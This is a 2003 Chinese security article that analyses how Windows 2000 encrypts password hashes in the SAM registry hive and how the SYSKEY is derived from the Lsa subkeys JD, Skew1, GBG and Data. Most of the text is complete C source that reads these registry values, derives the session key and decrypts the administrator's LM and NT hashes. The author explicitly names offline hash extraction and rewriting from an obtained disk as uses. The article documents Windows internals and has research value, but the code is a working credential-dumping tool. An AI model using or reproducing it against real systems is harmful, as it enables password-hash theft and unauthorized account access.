SAM的散列存儲(chǔ)加密解密算法以及SYSKEY的計(jì)算

創(chuàng)建時(shí)間：2003-06-04
文章屬性：原創(chuàng)
文章提交：flashsky (flashsky1_at_sina.com)

SAM的散列存儲(chǔ)加密解密算法以及SYSKEY的計(jì)算
轉(zhuǎn)摘請(qǐng)注明作者和安全焦點(diǎn)
作者：FLASHSKY
SITE：WWW.XFOCUS.NET，WWW.SHOPSKY.COM
郵件：flashsky@xfocus.org
作者單位：?jiǎn)⒚餍浅椒e極防御實(shí)驗(yàn)室

    SAM中存放在密碼散列這是大家都知道的，但是其密碼存放在對(duì)應(yīng)相對(duì)SID的V鍵下面卻是一種加密的形式，如何通過(guò)這個(gè)加密的串計(jì)算出密碼散列了，大家用PWDUMP3這樣的工具可以導(dǎo)出散列來(lái)，主要原理是系統(tǒng)空間會(huì)存在一個(gè)sampsecretsessionkey，PWDUMP3就是拷貝一個(gè)服務(wù)到對(duì)方機(jī)器上，讀出這個(gè)lsass進(jìn)程空間的sampsecretsessionkey再進(jìn)行解密的，其實(shí)這個(gè)sampsecretsessionkey的生成也是非常復(fù)
雜的，我們這里做一個(gè)比PWDUMP3更深入的一個(gè)探討和分析，sampsecretsessionkey的計(jì)算與生成，這樣我們就能在直接從物理文件中計(jì)算出sampsecretsessionkey，來(lái)解密注冊(cè)表中的密碼散列，對(duì)于一個(gè)忘記密碼的系統(tǒng)或一個(gè)不知道用戶口令但已經(jīng)獲得磁盤(pán)的系統(tǒng)有這重要意義，這樣我們完全就能通過(guò)注冊(cè)表文件的分析來(lái)解密注冊(cè)表中的密碼散列。
        通過(guò)分析，我們發(fā)現(xiàn)以前在NT中常說(shuō)的SYSKEY在W2K系統(tǒng)的這個(gè)過(guò)程中起著非常重要的作用，其實(shí)SYSKEY已經(jīng)做為W2K的一個(gè)固定組件而存在了，我們下面給出一個(gè)整個(gè)過(guò)程：
         系統(tǒng)引導(dǎo)時(shí)：
        計(jì)算獲得SYSKEY
        讀取注冊(cè)表中的SAM\SAM\Domains\Accoun\V中保存的KEY信息（一般是最后的0X38字節(jié)的前0X30字節(jié)）
        使用SYSKEY和F鍵的前0X10字節(jié)，與特殊的字串"!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%"，"0123456789012345678901234567890123456789"做MD5運(yùn)算，再與F鍵的后0X20字節(jié)做RC4運(yùn)算就可以獲得sampsecretsessionkey，這個(gè)
sampsecretsessionkey固定存放在LSASS進(jìn)程中，作為解密SAM中加密數(shù)據(jù)到散列時(shí)用
    

-------------------------------------------------
|系統(tǒng)計(jì)算出的SYSKEY                              |
|F鍵信息的前0x10字節(jié)                             |MD5
|"!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%"|--->------
|"0123456789012345678901234567890123456789"      |          |RC4
--------------------------------------------------          |------>sampsecretsessionkey
                                                            |
                     F鍵信息的后0x20字節(jié) -------------------

    
    當(dāng)需要解密SAM中加密數(shù)據(jù)到散列時(shí)（如遠(yuǎn)程登陸）:
        讀取sampsecretsessionkey，再與當(dāng)前用戶的相對(duì)SID，散列類型名（如LMPASSWORD，NTPASSWORD）做MD5運(yùn)算獲得針對(duì)這個(gè)用戶密碼散列的sessionkey
        利用sessionkey用RC4解密第一道加密的散列，再將用戶相對(duì)ID擴(kuò)展成14字節(jié)做DES切分，生成DESECB，再對(duì)用RC4處理后的散列進(jìn)行分開(kāi)成2次DES解密就可以獲得密碼散列。
       -------------------------
       |sampsecretsessionkey   |
       |sid                    |MD5
       |"LMPASSWOR"/"NTPASSWOR"|--->sessionkey---
       |                       |                 |RC4    2次DES(填充SID做KEY切分）
       -------------------------                 |----->-------------------------->HASH
                                                                          |
                對(duì)應(yīng)的SAM中加密的密碼散列 ---------------------------------


    這個(gè)算法相當(dāng)好，保證了不同用戶的相同散列在SAM存放不一樣（相對(duì)SID不一樣），不同機(jī)器的同一SID同口令的SAM中的散列存放不一樣（SYSKEY不同）；
        這個(gè)算法的DES/RC4都是可逆的，這樣如果我們能通過(guò)離線（文件）方式獲得SYSKEY的話（其他的信息都可以分析SAM文件獲得），我們完全實(shí)現(xiàn)離線修改SAM中口令的效果，不過(guò)這需要對(duì)注冊(cè)表的結(jié)構(gòu)和SAM中V/F鍵的數(shù)據(jù)結(jié)構(gòu)再做深入的研究，這里就不談了。
        那么SYSKEY是如何計(jì)算出來(lái)的呢？這可能是我發(fā)現(xiàn)MS最牛皮的一個(gè)地方了，先開(kāi)始想一定會(huì)存放在注冊(cè)表某處，呵呵，最后跟蹤MS引導(dǎo)時(shí)候的WINLOGON進(jìn)程才知道，SYSKEY是這樣計(jì)算出來(lái)的，很多人會(huì)大掉眼鏡吧：
        SYSKEY的計(jì)算是：SYSTEM\\CurrentControlSet\\Control\\Lsa下的
        JD，Skew1，GBG，Data四個(gè)鍵值的CLASS值通過(guò)換位得來(lái)的，靠，佩服MS。這樣我們完全可以離線分析注冊(cè)表就能獲得對(duì)其SAM的加密散列的導(dǎo)出或改寫(xiě)了。

    下面就是給出的完全實(shí)現(xiàn)計(jì)算SYSKEY-》sampsecretsessionkey，對(duì)特定用戶的SAM中加密的密碼散列再解密的代碼：當(dāng)然如果從運(yùn)行系統(tǒng)中解密散列也可以直接讀取sampsecretsessionkey，就象PWDUMP3那樣做的一樣也是可以的，但是如果要實(shí)現(xiàn)離線的就還需要再分析更多的東西。
    另外關(guān)于PWDUMP具體的方法，由于其是加密和反跟蹤的，我沒(méi)時(shí)間做仔細(xì)調(diào)式分析，但是從REGMON監(jiān)視其注冊(cè)表操作的過(guò)程來(lái)說(shuō)，是沒(méi)有去讀LSA下的任何東西的，因此可以斷定他是直接獲得ampsecretsessionkey來(lái)進(jìn)行對(duì)SAM內(nèi)容的解密到散列的。

//下面幾個(gè)函數(shù)的實(shí)現(xiàn)，DES相關(guān)的盒，ECB等的定義參考我以前發(fā)的文章 中的代碼，這里不再給出
//void deskey(char * LmPass,unsigned char * desecb)
//void rc4_key(unsigned char * rc4keylist,unsigned char * rc4key,int keylen);
//void md5init(unsigned char * LM);
//void md5final(unsigned char * LM);
//void initLMP(char * pass,unsigned char * LM);
//以前給出的des函數(shù)的實(shí)現(xiàn)沒(méi)有解密的部分，并且有個(gè)小錯(cuò)誤，因此這里再給出完整的一個(gè)

#include <stdio.h>
#include <windows.h>
#include "des.h"

void getsyskey(unsigned char * syskey);
void getsampsecretsessionkey(unsigned char * syskey,unsigned char * fkey);
void md5init(unsigned char * LM);
void md5final(unsigned char * LM);
void rc4_key(unsigned char * rc4keylist,unsigned char * rc4key,int keylen);
void rc4_2bc6(unsigned char * rc4keylist,int keylen,unsigned char * key);
void getsamkey(unsigned char * sampsskey,unsigned char * uid,unsigned char * passwordtype,unsigned char * sessionkey);
void getsamhash(unsigned char * ensaminfo,unsigned char * sessionkey,unsigned char * uid);
void initLMP(char * pass,unsigned char * LM);
void deskey(char * LmPass,unsigned char * desecb);
void des(unsigned char * LM,char * magic,unsigned char * ecb,long no);

void main()
{
    int i;
    //下面為了簡(jiǎn)單，這3個(gè)是直接指定的用戶，相對(duì)SID的注冊(cè)表鍵名和相對(duì)SID，大家也可以寫(xiě)成完全根據(jù)用戶名獲取的方式
    char username[]="SAM\\SAM\\Domains\\Account\\Users\\Names\\administrator";
    char keyname[]="SAM\\SAM\\Domains\\Account\\Users\\000001F4";
    unsigned long uid=0x1F4;
    unsigned char syskey[0x10];
    unsigned char ensamnt[0x10];
    unsigned char ensamlm[0x10];
    unsigned char sessionkey[0x10];
    unsigned char buf[0x400];
    unsigned char sampsecretsessionkey[0x10];
    unsigned char lmhash[0x10];
    unsigned char nthash[0x10];
    unsigned char fkey[0x30];
    unsigned long ss;
    DWORD regtype;
    DWORD regint;
    unsigned char passwordtype[5][100]={"LMPASSWORD","NTPASSWORD","LMPASSWORDHISTORY","NTPASSWORDHISTORY","MISCCREDDATA"};

    HKEY hkResult;
    HKEY hkResult1;
    //SAM中的鍵讀取先要提升自己成為L(zhǎng)OCASYSTEM權(quán)限，這里并沒(méi)有實(shí)現(xiàn),自己增加其中的代碼
    //讀出F鍵中用于計(jì)算
    regint=0x400;
    ss=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SAM\\SAM\\Domains\\Account",0,KEY_READ,&hkResult);
    if(ss!=0)
        printf("no Privilege!\n");
    ss=RegQueryValueEx(hkResult,"F", NULL,&regtype,buf,&regint);
    for(i=regint-1;i>=0;i--)
        if(buf[i]!=0)
            break;
    memcpy(fkey,buf+i-0x2f,0x30);
    ss=RegOpenKeyEx(HKEY_LOCAL_MACHINE,username,0,KEY_READ,&hkResult);
    //檢查此用戶是否存在
    if(ss!=ERROR_SUCCESS)
        return;
    //讀取該用戶下的V鍵中加密的散列信息
    //由于目前還未解析V中的結(jié)構(gòu)，我們就直接讀最后的那一串，一般都是如此存放在此
    //但也不排除例外，那就需要具體分析V中的結(jié)構(gòu)來(lái)計(jì)算了
    regint=0x400;
    ss=RegOpenKeyEx(HKEY_LOCAL_MACHINE,keyname,0,KEY_READ,&hkResult);
    ss=RegQueryValueEx(hkResult,"V", NULL,&regtype,buf,&regint);
    memcpy(ensamnt,buf+regint-0x18,0x10);
    memcpy(ensamlm,buf+regint-0x2c,0x10);
    
    //計(jì)算SYSKEY，W2K系統(tǒng)默認(rèn)SYSKEY使用,且成為其固定的一個(gè)組件
    getsyskey(syskey);
    //利用SYSKEY，F(xiàn)鍵中的KEY計(jì)算sampsecretsessionkey
    getsampsecretsessionkey(syskey,fkey);
    memcpy(sampsecretsessionkey,fkey+0x10,0x10);
    //上面的就是系統(tǒng)引導(dǎo)時(shí)完成的工作，這個(gè)sampsecretsessionkey固定保存在LSASS的進(jìn)程空間內(nèi)
    //當(dāng)認(rèn)證等或如PWDUMP3工作時(shí)候，就是先從系統(tǒng)中直接讀sampsecretsessionkey再進(jìn)行處理

    //根據(jù)具體用戶的相對(duì)SID，要恢復(fù)散列的散列類型，生成SESSIONKEY，如下面就是針對(duì)LM散列的
    getsamkey(sampsecretsessionkey,&uid,passwordtype[0],sessionkey);
    memcpy(lmhash,ensamlm,0x10);
    //利用SESSIONKEY，SAM中加密的LM散列，相對(duì)SID做RC4/DES解密獲得真正的散列
    getsamhash(lmhash,sessionkey,&uid);
    printf("HASH::");
    for(i=0;i<0x10;i++)
        printf("%02x",lmhash[i]);
    printf(":");
    //根據(jù)具體用戶的相對(duì)SID，要恢復(fù)散列的散列類型，生成SESSIONKEY，如下面就是針對(duì)NTLM散列的
    getsamkey(sampsecretsessionkey,&uid,passwordtype[1],sessionkey);
    memcpy(nthash,ensamnt,0x10);
    //利用SESSIONKEY，SAM中加密的NTLM散列，相對(duì)SID做RC4/DES解密獲得真正的散列
    getsamhash(nthash,sessionkey,&uid);
    for(i=0;i<0x10;i++)
        printf("%02x",nthash[i]);
    printf("\n");
}

void getsamhash(unsigned char * ensaminfo,unsigned char * sessionkey,unsigned char * uid)
{
    //利用SESSIONKEY，SAM中加密的LM散列，相對(duì)SID做RC4/DES解密獲得真正的散列
    unsigned char desecb[128];
    unsigned char rc4keylist[0x102];
    unsigned char LM[0x10];
    unsigned char p1[0xe];
    unsigned char p2[0x10];
    memcpy(p1,uid,4);
    memcpy(p1+4,uid,4);
    memcpy(p1+8,uid,4);
    memcpy(p1+0xc,uid,2);
    //上面是用SID填充DESECB的KEY
    rc4_key(rc4keylist,sessionkey,0x10);
    rc4_2bc6(rc4keylist,0x10,ensaminfo);
    //RC4處理一次再用DES解密
    initLMP(p1,LM);
    deskey(LM,desecb);
    des(p2,ensaminfo,desecb,0);
    initLMP(p1+7,LM);
    deskey(LM,desecb);
    des(p2+8,ensaminfo+8,desecb,0);
    memcpy(ensaminfo,p2,0x10);
}

void getsamkey(unsigned char * sampsskey,unsigned long * uid,unsigned char * passwordtype,unsigned char * sessionkey)
{
    //根據(jù)具體用戶的相對(duì)SID，要恢復(fù)散列的散列類型，MD5生成SESSIONKEY
    unsigned char LM[0x58];
    int len,i;

    md5init(LM);
    for(i=0;i<20;i++)
        if(passwordtype[i]==0)
            break;
    len=i+1;
    memcpy(LM+0x18,sampsskey,0x10);
    memcpy(LM+0x28,(unsigned char *)uid,4);
    memcpy(LM+0x2c,passwordtype,len);
    memset(LM+0x2c+len,0x80,1);
    memset(LM+0x2c+len+1,0x0,0x58-(0x2c+len+1));
    *(DWORD *)LM=0x200;
    *(DWORD *)(LM+0X50)=0xF8;
    md5final(LM);
    memcpy(sessionkey,LM+8,0x10);
}

void getsyskey(unsigned char * syskey)
{
    unsigned char keyselect[]={0x8,0xA,0x3,0x7,0x2,0x1,0x9,0xF,
        0x0,0x5,0xd,0x4,0xb,0x6,0xc,0xe};  
    //換位表
    unsigned char syskey1[0x10];
    HKEY hkResult;
    HKEY hkResult1;
    int i,j;
    long ss;
    unsigned char classinfo[0x10];
    DWORD c1;

    ss=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Control\\Lsa",0,KEY_READ,&hkResult);
    if(ss!=ERROR_SUCCESS)
        return;
    ss=RegOpenKeyEx(hkResult,"JD",0,KEY_READ,&hkResult1);
    i=0;
    memset(syskey1,0,0x10);
    c1=0x10;
    if(ss==ERROR_SUCCESS)
    {
        ss=RegQueryInfoKey(hkResult1,classinfo,&c1,0,0,0,0,0,0,0,0,0);
        RegCloseKey(hkResult1);
        if(ss==ERROR_SUCCESS)
        {
            printf("%s\n",classinfo);
            for(j=0;j<8;j++)
            {
                if(classinfo[j]>=0x30 && classinfo[j]<=0x39)
                    classinfo[j]=classinfo[j]-0x30;
                else if(classinfo[j]>='a' && classinfo[j]<='f')
                    classinfo[j]=classinfo[j]-'a'+0xa;
                else if(classinfo[j]>='A' && classinfo[j]<='F')
                    classinfo[j]=classinfo[j]-'A'+0xa;
                else
                    return;
            }
            syskey1[i+0]=16*classinfo[0]+classinfo[1];
            syskey1[i+1]=16*classinfo[2]+classinfo[3];
            syskey1[i+2]=16*classinfo[4]+classinfo[5];
            syskey1[i+3]=16*classinfo[6]+classinfo[7];
            i=i+4;
        }
    }
    c1=0x10;
    ss=RegOpenKeyEx(hkResult,"Skew1",0,KEY_READ,&hkResult1);
    if(ss==ERROR_SUCCESS)
    {
        ss=RegQueryInfoKey(hkResult1,classinfo,&c1,0,0,0,0,0,0,0,0,0);
        RegCloseKey(hkResult1);
        if(ss==ERROR_SUCCESS)
        {
            printf("%s\n",classinfo);
            for(j=0;j<8;j++)
            {
                if(classinfo[j]>=0x30 && classinfo[j]<=0x39)
                    classinfo[j]=classinfo[j]-0x30;
                else if(classinfo[j]>='a' && classinfo[j]<='f')
                    classinfo[j]=classinfo[j]-'a'+0xa;
                else if(classinfo[j]>='A' && classinfo[j]<='F')
                    classinfo[j]=classinfo[j]-'A'+0xa;
                else
                    return;
            }
            syskey1[i+0]=16*classinfo[0]+classinfo[1];
            syskey1[i+1]=16*classinfo[2]+classinfo[3];
            syskey1[i+2]=16*classinfo[4]+classinfo[5];
            syskey1[i+3]=16*classinfo[6]+classinfo[7];
            i=i+4;
        }
    }
    c1=0x10;
    ss=RegOpenKeyEx(hkResult,"GBG",0,KEY_READ,&hkResult1);
    if(ss==ERROR_SUCCESS)
    {
        ss=RegQueryInfoKey(hkResult1,classinfo,&c1,0,0,0,0,0,0,0,0,0);
        RegCloseKey(hkResult1);
        if(ss==ERROR_SUCCESS)
        {
            printf("%s\n",classinfo);
            for(j=0;j<8;j++)
            {
                if(classinfo[j]>=0x30 && classinfo[j]<=0x39)
                    classinfo[j]=classinfo[j]-0x30;
                else if(classinfo[j]>='a' && classinfo[j]<='f')
                    classinfo[j]=classinfo[j]-'a'+0xa;
                else if(classinfo[j]>='A' && classinfo[j]<='F')
                    classinfo[j]=classinfo[j]-'A'+0xa;
                else
                    return;
            }
            syskey1[i+0]=16*classinfo[0]+classinfo[1];
            syskey1[i+1]=16*classinfo[2]+classinfo[3];
            syskey1[i+2]=16*classinfo[4]+classinfo[5];
            syskey1[i+3]=16*classinfo[6]+classinfo[7];
            i=i+4;
        }
    }
    c1=0x10;
    ss=RegOpenKeyEx(hkResult,"Data",0,KEY_READ,&hkResult1);
    if(ss==ERROR_SUCCESS)
    {
        ss=RegQueryInfoKey(hkResult1,classinfo,&c1,0,0,0,0,0,0,0,0,0);
        RegCloseKey(hkResult1);
        if(ss==ERROR_SUCCESS)
        {
            printf("%s\n",classinfo);
            for(j=0;j<8;j++)
            {
                if(classinfo[j]>=0x30 && classinfo[j]<=0x39)
                    classinfo[j]=classinfo[j]-0x30;
                else if(classinfo[j]>='a' && classinfo[j]<='f')
                    classinfo[j]=classinfo[j]-'a'+0xa;
                else if(classinfo[j]>='A' && classinfo[j]<='F')
                    classinfo[j]=classinfo[j]-'A'+0xa;
                else
                    return;
            }
            syskey1[i+0]=16*classinfo[0]+classinfo[1];
            syskey1[i+1]=16*classinfo[2]+classinfo[3];
            syskey1[i+2]=16*classinfo[4]+classinfo[5];
            syskey1[i+3]=16*classinfo[6]+classinfo[7];
            i=i+4;
        }
    }
    //這4個(gè)鍵的CLASS值組合起來(lái)做換位就是MS的SYSKEY了
    for(i=0;i<0x10;i++)
    {
        syskey[keyselect[i]]=syskey1[i];
    }
    for(i=0;i<0x10;i++)
        printf("0x%02x ",syskey[i]);
    printf("\n");
}

void getsampsecretsessionkey(unsigned char * syskey,unsigned char * fkey)
{
    unsigned char LM[0x58];
    unsigned char rc4keylist[0x102];
    char m1[]="!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%";
    char m2[]="0123456789012345678901234567890123456789";

    md5init(LM);
    memcpy(LM+0x18,fkey,0x10);
    memcpy(LM+0x28,m1,0x2f);
    memcpy(LM+0x57,syskey,1);
    *(DWORD *)LM=0x278;
    md5final(LM);
    memcpy(LM+0x18,syskey+1,0xf);
    memcpy(LM+0x27,m2,0x29);
    *(DWORD *)LM=0x5c0;
    memset(LM+0x50,0x80,1);
    memset(LM+0x51,0,7);
    md5final(LM);
    *(DWORD *)LM=0x600;
    memset(LM+0x18,0,0x38);
    *(DWORD *)(LM+0x50)=0x3c0;
    *(DWORD *)(LM+0x54)=0;
    md5final(LM);
    rc4_key(rc4keylist,LM+8,0x10);
    rc4_2bc6(rc4keylist,0x20,fkey+0x10);
    //這里生成在fkey中的前0X10字節(jié)就是sampsecretsessionkey
    md5init(LM);
    memcpy(LM+0x18,fkey+0x10,0x10);
    memcpy(LM+0x28,m2,0x29);
    memcpy(LM+0x51,fkey+0x10,0x7);
    *(DWORD *)LM=0x248;
    md5final(LM);
    memcpy(LM+0x18,fkey+0x17,0x9);
    memcpy(LM+0x21,m1,0x2f);
    memset(LM+0x50,0x80,1);
    memset(LM+0x51,0,7);
    *(DWORD *)LM=0x5c0;
    md5final(LM);
    memset(LM+0x18,0,0x40);
    *(DWORD *)LM=0x600;
    *(DWORD *)(LM+0x50)=0x3c0;
    *(DWORD *)(LM+0x54)=0;
    md5final(LM);
}

void rc4_2bc6(unsigned char * rc4keylist,int keylen,unsigned char * key)
{
    unsigned long c1;
    unsigned char d1,b1,a1;
    int i;
    c1=rc4keylist[0x100];
    d1=rc4keylist[0x101];
    for(i=0;i<keylen;i++)
    {
        c1=c1++;
        c1=c1%256;
        a1=rc4keylist[c1];
        d1=d1+a1;
        b1=rc4keylist[d1];
        rc4keylist[c1]=b1;
        rc4keylist[d1]=a1;
        a1=a1+b1;
        b1=key[i];
        a1=rc4keylist[a1];
        b1=b1^a1;
        key[i]=b1;
    }
}


void des(unsigned char * LM,char * magic,unsigned char * ecb,long no)
{
    DWORD d1,d2,d3,d4;
    DWORD a1,a2,a3;
    int i;
    d1= *(DWORD *)magic;
    d2= *(DWORD *)(magic+4);
    d1 = (d1<<4)|(d1>>0x1c);
    d3 = d1;
    d1 = (d1^d2)&0xf0f0f0f0;
    d3 = d3^d1;
    d2 = d2^d1;
    d2 =(d2<<0x14)|(d2>>0xc);
    d1 = d2;
    d2 = (d2^d3)&0xfff0000f;
    d1 = d1 ^ d2;
    d3 = d3^d2;
    d1 = (d1<<0xe)|(d1>>0x12);
    d2 = d1;
    d1 = (d1 ^ d3) & 0x33333333;
    d2 = d2 ^ d1;
    d3 = d3^d1;
    d3 = (d3<<0x16)|(d3>>0xa);
    d1 = d3;
    d3 = (d3 ^ d2)&0x3fc03fc;
    d1 = d1^d3;
    d2 = d2^d3;
    d1 = (d1<<9)|(d1>>0x17);
    d3 = d1;
    d1 = (d1^d2)&0xaaaaaaaa;
    d3 = d3^d1;
    d2 = d2^d1;
    d2 = (d2<<1)|(d2>>0x1f);
    if(no!=0)
    {
        for(i=0;i<8;i++)
        {
            a1=0;
            d1=*(DWORD *)(ecb+16*i);
            d4=*(DWORD *)(ecb+16*i+4);
            d1=(d1^d3)&0xfcfcfcfc;
            d4=(d4^d3)&0xcfcfcfcf;
            a1=d1&0xff;
            a2=(d1>>8)&0xff;
            d4=(d4>>4)|(d4<<0x1c);
            a3=DESSpBox1[a1/4];
            a1=d4&0xff;
            d2=d2^a3;
            a3=DESSpBox3[a2/4];
            d2=d2^a3;
            a2=(d4>>8)&0xff;
            d1=d1>>0x10;
            a3=DESSpBox2[a1/4];
            d2=d2^a3;
            a1=(d1>>8)&0xff;
            d4=d4>>0x10;
            a3=DESSpBox4[a2/4];
            d2=d2^a3;
            a2=(d4>>8)&0xff;
            d1=d1&0xff;
            d4=d4&0xff;
            a1=DESSpBox7[a1/4];
            d2=d2^a1;
            a1=DESSpBox8[a2/4];
            d2=d2^a1;
            a1=DESSpBox5[d1/4];
            d2=d2^a1;
            a1=DESSpBox6[d4/4];
            d2=d2^a1;

            a1=0;
            d1=*(DWORD *)(ecb+16*i+8);
            d4=*(DWORD *)(ecb+16*i+0xc);
            d1=(d1^d2)&0xfcfcfcfc;
            d4=(d4^d2)&0xcfcfcfcf;
            a1=d1&0xff;
            a2=(d1>>8)&0xff;
            d4=(d4>>4)|(d4<<0x1c);
            a3=DESSpBox1[a1/4];
            a1=d4&0xff;
            d3=d3^a3;
            a3=DESSpBox3[a2/4];
            d3=d3^a3;
            a2=(d4>>8)&0xff;
            d1=d1>>0x10;
            a3=DESSpBox2[a1/4];
            d3=d3^a3;
            a1=(d1>>8)&0xff;
            d4=d4>>0x10;
            a3=DESSpBox4[a2/4];
            d3=d3^a3;
            a2=(d4>>8)&0xff;
            d1=d1&0xff;
            d4=d4&0xff;
            a1=DESSpBox7[a1/4];
            d3=d3^a1;
            a1=DESSpBox8[a2/4];
            d3=d3^a1;
            a1=DESSpBox5[d1/4];
            d3=d3^a1;
            a1=DESSpBox6[d4/4];
            d3=d3^a1;
        }
        d3=(d3>>1)|(d3<<0x1f);
        d1=d2;
        d2=(d2^d3)&0XAAAAAAAA;
        d1=d1^d2;
        d3=d3^d2;
        d1=(d1<<0x17)|(d1>>9);
        d2=d1;
        d1=(d1^d3)&0x3fc03fc;
        d2=(d2^d1);
        d3=d3^d1;
        d2=(d2<<0xa)|(d2>>0x16);
        d1=d2;
        d2=(d2^d3)&0x33333333;
        d1=d1^d2;
        d3=d3^d2;
        d3=(d3<<0x12)|(d3>>0xe);
        d2=d3;
        d3=(d3^d1)&0xfff0000f;
        d2=d2^d3;
        d1=d1^d3;
        d2=(d2<<0xc)|(d2>>0x14);
        d3=d2;
        d2=(d2^d1)&0xf0f0f0f0;
        d3=d3^d2;
        d1=d1^d2;
        d1=(d1>>4)|(d1<<0x1c);
        *(DWORD *)LM=d1;
        *(DWORD *)(LM+4)=d3;
    }
    else
    {
        for(i=7;i>=0;i--)
        {
            a1=0;
            d1=*(DWORD *)(ecb+16*i+8);
            d4=*(DWORD *)(ecb+16*i+0xc);
            d1=(d1^d3)&0xfcfcfcfc;
            d4=(d4^d3)&0xcfcfcfcf;
            a1=d1&0xff;
            a2=(d1>>8)&0xff;
            d4=(d4>>4)|(d4<<0x1c);
            a3=DESSpBox1[a1/4];
            a1=d4&0xff;
            d2=d2^a3;
            a3=DESSpBox3[a2/4];
            d2=d2^a3;
            a2=(d4>>8)&0xff;
            d1=d1>>0x10;
            a3=DESSpBox2[a1/4];
            d2=d2^a3;
            a1=(d1>>8)&0xff;
            d4=d4>>0x10;
            a3=DESSpBox4[a2/4];
            d2=d2^a3;
            a2=(d4>>8)&0xff;
            d1=d1&0xff;
            d4=d4&0xff;
            a1=DESSpBox7[a1/4];
            d2=d2^a1;
            a1=DESSpBox8[a2/4];
            d2=d2^a1;
            a1=DESSpBox5[d1/4];
            d2=d2^a1;
            a1=DESSpBox6[d4/4];
            d2=d2^a1;

            a1=0;
            d1=*(DWORD *)(ecb+16*i+0);
            d4=*(DWORD *)(ecb+16*i+0x4);
            d1=(d1^d2)&0xfcfcfcfc;
            d4=(d4^d2)&0xcfcfcfcf;
            a1=d1&0xff;
            a2=(d1>>8)&0xff;
            d4=(d4>>4)|(d4<<0x1c);
            a3=DESSpBox1[a1/4];
            a1=d4&0xff;
            d3=d3^a3;
            a3=DESSpBox3[a2/4];
            d3=d3^a3;
            a2=(d4>>8)&0xff;
            d1=d1>>0x10;
            a3=DESSpBox2[a1/4];
            d3=d3^a3;
            a1=(d1>>8)&0xff;
            d4=d4>>0x10;
            a3=DESSpBox4[a2/4];
            d3=d3^a3;
            a2=(d4>>8)&0xff;
            d1=d1&0xff;
            d4=d4&0xff;
            a1=DESSpBox7[a1/4];
            d3=d3^a1;
            a1=DESSpBox8[a2/4];
            d3=d3^a1;
            a1=DESSpBox5[d1/4];
            d3=d3^a1;
            a1=DESSpBox6[d4/4];
            d3=d3^a1;
        }
        d3=(d3>>1)|(d3<<0x1f);
        d1=d2;
        d2=(d2^d3)&0XAAAAAAAA;
        d1=d1^d2;
        d3=d3^d2;
        d1=(d1<<0x17)|(d1>>9);
        d2=d1;
        d1=(d1^d3)&0x3fc03fc;
        d2=(d2^d1);
        d3=d3^d1;
        d2=(d2<<0xa)|(d2>>0x16);
        d1=d2;
        d2=(d2^d3)&0x33333333;
        d1=d1^d2;
        d3=d3^d2;
        d3=(d3<<0x12)|(d3>>0xe);
        d2=d3;
        d3=(d3^d1)&0xfff0000f;
        d2=d2^d3;
        d1=d1^d3;
        d2=(d2<<0xc)|(d2>>0x14);
        d3=d2;
        d2=(d2^d1)&0xf0f0f0f0;
        d3=d3^d2;
        d1=d1^d2;
        d1=(d1>>4)|(d1<<0x1c);
        *(DWORD *)LM=d1;
        *(DWORD *)(LM+4)=d3;
    }
}